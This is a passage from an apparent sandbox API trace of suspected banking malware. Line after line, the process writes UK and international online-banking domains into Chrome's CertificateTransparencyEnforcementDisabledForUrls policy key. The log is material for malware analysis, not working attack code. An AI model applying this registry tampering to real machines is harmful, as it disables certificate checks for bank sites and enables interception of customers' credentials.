	[0193.062] RegSetValueExA (in: hKey=0x77c, lpValueName="323", Reserved=0x0, dwType=0x1, lpData="onlinebanking.natwestoffshore.com", cbData=0x21 | out: lpData="onlinebanking.natwestoffshore.com") returned 0x0
	[0193.063] RegCloseKey (hKey=0x77c) returned 0x0
	[0193.063] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x778) returned 0x0
	[0193.063] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x780, lpdwDisposition=0x0) returned 0x0
	[0193.063] RegSetValueExA (in: hKey=0x780, lpValueName="324", Reserved=0x0, dwType=0x1, lpData="online.adambank.com", cbData=0x13 | out: lpData="online.adambank.com") returned 0x0
	[0193.064] RegCloseKey (hKey=0x780) returned 0x0
	[0193.064] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x77c) returned 0x0
	[0193.064] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x784, lpdwDisposition=0x0) returned 0x0
	[0193.064] RegSetValueExA (in: hKey=0x784, lpValueName="325", Reserved=0x0, dwType=0x1, lpData="home1.cybusinessonline.co.uk", cbData=0x1c | out: lpData="home1.cybusinessonline.co.uk") returned 0x0
	[0193.065] RegCloseKey (hKey=0x784) returned 0x0
	[0193.065] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x780) returned 0x0
	[0193.065] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x788, lpdwDisposition=0x0) returned 0x0
	[0193.065] RegSetValueExA (in: hKey=0x788, lpValueName="326", Reserved=0x0, dwType=0x1, lpData="online.coutts.com", cbData=0x11 | out: lpData="online.coutts.com") returned 0x0
	[0193.066] RegCloseKey (hKey=0x788) returned 0x0
	[0193.066] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x784) returned 0x0
	[0193.067] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x78c, lpdwDisposition=0x0) returned 0x0
	[0193.067] RegSetValueExA (in: hKey=0x78c, lpValueName="327", Reserved=0x0, dwType=0x1, lpData="fdonline.co-operativebank.co.uk", cbData=0x1f | out: lpData="fdonline.co-operativebank.co.uk") returned 0x0
	[0193.067] RegCloseKey (hKey=0x78c) returned 0x0
	[0193.068] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x788) returned 0x0
	[0193.068] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x790, lpdwDisposition=0x0) returned 0x0
	[0193.068] RegSetValueExA (in: hKey=0x790, lpValueName="328", Reserved=0x0, dwType=0x1, lpData="cardonebanking.com", cbData=0x12 | out: lpData="cardonebanking.com") returned 0x0
	[0193.069] RegCloseKey (hKey=0x790) returned 0x0
	[0193.069] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x78c) returned 0x0
	[0193.069] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x794, lpdwDisposition=0x0) returned 0x0
	[0193.069] RegSetValueExA (in: hKey=0x794, lpValueName="329", Reserved=0x0, dwType=0x1, lpData="online.ybs.co.uk", cbData=0x10 | out: lpData="online.ybs.co.uk") returned 0x0
	[0193.070] RegCloseKey (hKey=0x794) returned 0x0
	[0193.070] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x790) returned 0x0
	[0193.070] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x798, lpdwDisposition=0x0) returned 0x0
	[0193.070] RegSetValueExA (in: hKey=0x798, lpValueName="330", Reserved=0x0, dwType=0x1, lpData="clients.tilneybestinvest.co.uk", cbData=0x1e | out: lpData="clients.tilneybestinvest.co.uk") returned 0x0
	[0193.071] RegCloseKey (hKey=0x798) returned 0x0
	[0193.071] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x794) returned 0x0
	[0193.071] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x79c, lpdwDisposition=0x0) returned 0x0
	[0193.071] RegSetValueExA (in: hKey=0x79c, lpValueName="331", Reserved=0x0, dwType=0x1, lpData="bankinguk.secure.investec.com", cbData=0x1d | out: lpData="bankinguk.secure.investec.com") returned 0x0
	[0193.072] RegCloseKey (hKey=0x79c) returned 0x0
	[0193.072] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x798) returned 0x0
	[0193.072] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7a0, lpdwDisposition=0x0) returned 0x0
	[0193.072] RegSetValueExA (in: hKey=0x7a0, lpValueName="332", Reserved=0x0, dwType=0x1, lpData="www.hsbc.co.uk", cbData=0xe | out: lpData="www.hsbc.co.uk") returned 0x0
	[0193.073] RegCloseKey (hKey=0x7a0) returned 0x0
	[0193.073] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x79c) returned 0x0
	[0193.073] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7a4, lpdwDisposition=0x0) returned 0x0
	[0193.073] RegSetValueExA (in: hKey=0x7a4, lpValueName="333", Reserved=0x0, dwType=0x1, lpData="hsbc.co.uk", cbData=0xa | out: lpData="hsbc.co.uk") returned 0x0
	[0193.074] RegCloseKey (hKey=0x7a4) returned 0x0
	[0193.074] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7a0) returned 0x0
	[0193.075] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7a8, lpdwDisposition=0x0) returned 0x0
	[0193.075] RegSetValueExA (in: hKey=0x7a8, lpValueName="334", Reserved=0x0, dwType=0x1, lpData="cashmanagement.barclays.net", cbData=0x1b | out: lpData="cashmanagement.barclays.net") returned 0x0
	[0193.076] RegCloseKey (hKey=0x7a8) returned 0x0
	[0193.076] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7a4) returned 0x0
	[0193.076] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7ac, lpdwDisposition=0x0) returned 0x0
	[0193.076] RegSetValueExA (in: hKey=0x7ac, lpValueName="335", Reserved=0x0, dwType=0x1, lpData="businessinternetbanking.tsb.co.uk", cbData=0x21 | out: lpData="businessinternetbanking.tsb.co.uk") returned 0x0
	[0193.077] RegCloseKey (hKey=0x7ac) returned 0x0
	[0193.078] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7a8) returned 0x0
	[0193.078] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7b0, lpdwDisposition=0x0) returned 0x0
	[0193.078] RegSetValueExA (in: hKey=0x7b0, lpValueName="336", Reserved=0x0, dwType=0x1, lpData="corporate.santander.co.uk", cbData=0x19 | out: lpData="corporate.santander.co.uk") returned 0x0
	[0193.079] RegCloseKey (hKey=0x7b0) returned 0x0
	[0193.079] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7ac) returned 0x0
	[0193.079] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7b4, lpdwDisposition=0x0) returned 0x0
	[0193.079] RegSetValueExA (in: hKey=0x7b4, lpValueName="337", Reserved=0x0, dwType=0x1, lpData="corporate.metrobankonline.co.uk", cbData=0x1f | out: lpData="corporate.metrobankonline.co.uk") returned 0x0
	[0193.080] RegCloseKey (hKey=0x7b4) returned 0x0
	[0193.080] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7b0) returned 0x0
	[0193.080] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7b8, lpdwDisposition=0x0) returned 0x0
	[0193.080] RegSetValueExA (in: hKey=0x7b8, lpValueName="338", Reserved=0x0, dwType=0x1, lpData="cbonline.bankofscotland.co.uk", cbData=0x1d | out: lpData="cbonline.bankofscotland.co.uk") returned 0x0
	[0193.081] RegCloseKey (hKey=0x7b8) returned 0x0
	[0193.081] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7b4) returned 0x0
	[0193.081] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7bc, lpdwDisposition=0x0) returned 0x0
	[0193.081] RegSetValueExA (in: hKey=0x7bc, lpValueName="339", Reserved=0x0, dwType=0x1, lpData="cbonline.lloydsbank.com", cbData=0x17 | out: lpData="cbonline.lloydsbank.com") returned 0x0
	[0193.105] RegCloseKey (hKey=0x7bc) returned 0x0
	[0193.105] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7b8) returned 0x0
	[0193.105] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7c0, lpdwDisposition=0x0) returned 0x0
	[0193.105] RegSetValueExA (in: hKey=0x7c0, lpValueName="340", Reserved=0x0, dwType=0x1, lpData="www.rbsidigital.com", cbData=0x13 | out: lpData="www.rbsidigital.com") returned 0x0
	[0193.106] RegCloseKey (hKey=0x7c0) returned 0x0
	[0193.106] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7bc) returned 0x0
	[0193.106] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7c4, lpdwDisposition=0x0) returned 0x0
	[0193.106] RegSetValueExA (in: hKey=0x7c4, lpValueName="341", Reserved=0x0, dwType=0x1, lpData="rbsidigital.com", cbData=0xf | out: lpData="rbsidigital.com") returned 0x0
	[0193.107] RegCloseKey (hKey=0x7c4) returned 0x0
	[0193.107] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7c0) returned 0x0
	[0193.108] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7c8, lpdwDisposition=0x0) returned 0x0
	[0193.108] RegSetValueExA (in: hKey=0x7c8, lpValueName="342", Reserved=0x0, dwType=0x1, lpData="ebaer.juliusbaer.com", cbData=0x14 | out: lpData="ebaer.juliusbaer.com") returned 0x0
	[0193.109] RegCloseKey (hKey=0x7c8) returned 0x0
	[0193.109] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7c4) returned 0x0
	[0193.109] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7cc, lpdwDisposition=0x0) returned 0x0
	[0193.109] RegSetValueExA (in: hKey=0x7cc, lpValueName="343", Reserved=0x0, dwType=0x1, lpData="ebanking-ch2.ubs.com", cbData=0x14 | out: lpData="ebanking-ch2.ubs.com") returned 0x0
	[0193.110] RegCloseKey (hKey=0x7cc) returned 0x0
	[0193.110] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7c8) returned 0x0
	[0193.110] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7d0, lpdwDisposition=0x0) returned 0x0
	[0193.110] RegSetValueExA (in: hKey=0x7d0, lpValueName="344", Reserved=0x0, dwType=0x1, lpData="live.barcap.com", cbData=0xf | out: lpData="live.barcap.com") returned 0x0
	[0193.111] RegCloseKey (hKey=0x7d0) returned 0x0
	[0193.111] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7cc) returned 0x0
	[0193.111] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7d4, lpdwDisposition=0x0) returned 0x0
	[0193.111] RegSetValueExA (in: hKey=0x7d4, lpValueName="345", Reserved=0x0, dwType=0x1, lpData="www.coventrybuildingsociety.co.uk", cbData=0x21 | out: lpData="www.coventrybuildingsociety.co.uk") returned 0x0
	[0193.112] RegCloseKey (hKey=0x7d4) returned 0x0
	[0193.112] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7d0) returned 0x0
	[0193.112] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7d8, lpdwDisposition=0x0) returned 0x0
	[0193.112] RegSetValueExA (in: hKey=0x7d8, lpValueName="346", Reserved=0x0, dwType=0x1, lpData="coventrybuildingsociety.co.uk", cbData=0x1d | out: lpData="coventrybuildingsociety.co.uk") returned 0x0
	[0193.113] RegCloseKey (hKey=0x7d8) returned 0x0
	[0193.113] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7d4) returned 0x0
	[0193.113] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7dc, lpdwDisposition=0x0) returned 0x0
	[0193.113] RegSetValueExA (in: hKey=0x7dc, lpValueName="347", Reserved=0x0, dwType=0x1, lpData="interface.htb.co.uk", cbData=0x13 | out: lpData="interface.htb.co.uk") returned 0x0
	[0193.114] RegCloseKey (hKey=0x7dc) returned 0x0
	[0193.114] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7d8) returned 0x0
	[0193.115] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7e0, lpdwDisposition=0x0) returned 0x0
	[0193.115] RegSetValueExA (in: hKey=0x7e0, lpValueName="348", Reserved=0x0, dwType=0x1, lpData="login.secure.investec.com", cbData=0x19 | out: lpData="login.secure.investec.com") returned 0x0
	[0193.116] RegCloseKey (hKey=0x7e0) returned 0x0
	[0193.116] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7dc) returned 0x0
	[0193.116] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7e4, lpdwDisposition=0x0) returned 0x0
	[0193.116] RegSetValueExA (in: hKey=0x7e4, lpValueName="349", Reserved=0x0, dwType=0x1, lpData="www.onlinebanking.iombank.com", cbData=0x1d | out: lpData="www.onlinebanking.iombank.com") returned 0x0
	[0193.117] RegCloseKey (hKey=0x7e4) returned 0x0
	[0193.117] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7e0) returned 0x0
	[0193.117] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7e8, lpdwDisposition=0x0) returned 0x0
	[0193.117] RegSetValueExA (in: hKey=0x7e8, lpValueName="350", Reserved=0x0, dwType=0x1, lpData="onlinebanking.iombank.com", cbData=0x19 | out: lpData="onlinebanking.iombank.com") returned 0x0
	[0193.118] RegCloseKey (hKey=0x7e8) returned 0x0
	[0193.118] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7e4) returned 0x0
	[0193.118] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7ec, lpdwDisposition=0x0) returned 0x0
	[0193.118] RegSetValueExA (in: hKey=0x7ec, lpValueName="351", Reserved=0x0, dwType=0x1, lpData="www2.firstdirect.com", cbData=0x14 | out: lpData="www2.firstdirect.com") returned 0x0
	[0193.119] RegCloseKey (hKey=0x7ec) returned 0x0
	[0193.119] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7e8) returned 0x0
	[0193.119] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7f0, lpdwDisposition=0x0) returned 0x0
	[0193.119] RegSetValueExA (in: hKey=0x7f0, lpValueName="352", Reserved=0x0, dwType=0x1, lpData="wholesale.flagstar.com", cbData=0x16 | out: lpData="wholesale.flagstar.com") returned 0x0
	[0193.120] RegCloseKey (hKey=0x7f0) returned 0x0
	[0193.120] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7ec) returned 0x0
	[0193.120] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7f4, lpdwDisposition=0x0) returned 0x0
	[0193.120] RegSetValueExA (in: hKey=0x7f4, lpValueName="353", Reserved=0x0, dwType=0x1, lpData="business.co-operativebank.co.uk", cbData=0x1f | out: lpData="business.co-operativebank.co.uk") returned 0x0
	[0193.121] RegCloseKey (hKey=0x7f4) returned 0x0
	[0193.121] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7f0) returned 0x0
	[0193.121] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7f8, lpdwDisposition=0x0) returned 0x0
	[0193.122] RegSetValueExA (in: hKey=0x7f8, lpValueName="354", Reserved=0x0, dwType=0x1, lpData="transtasman.online.anz.com", cbData=0x1a | out: lpData="transtasman.online.anz.com") returned 0x0
	[0193.122] RegCloseKey (hKey=0x7f8) returned 0x0
	[0193.123] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7f4) returned 0x0
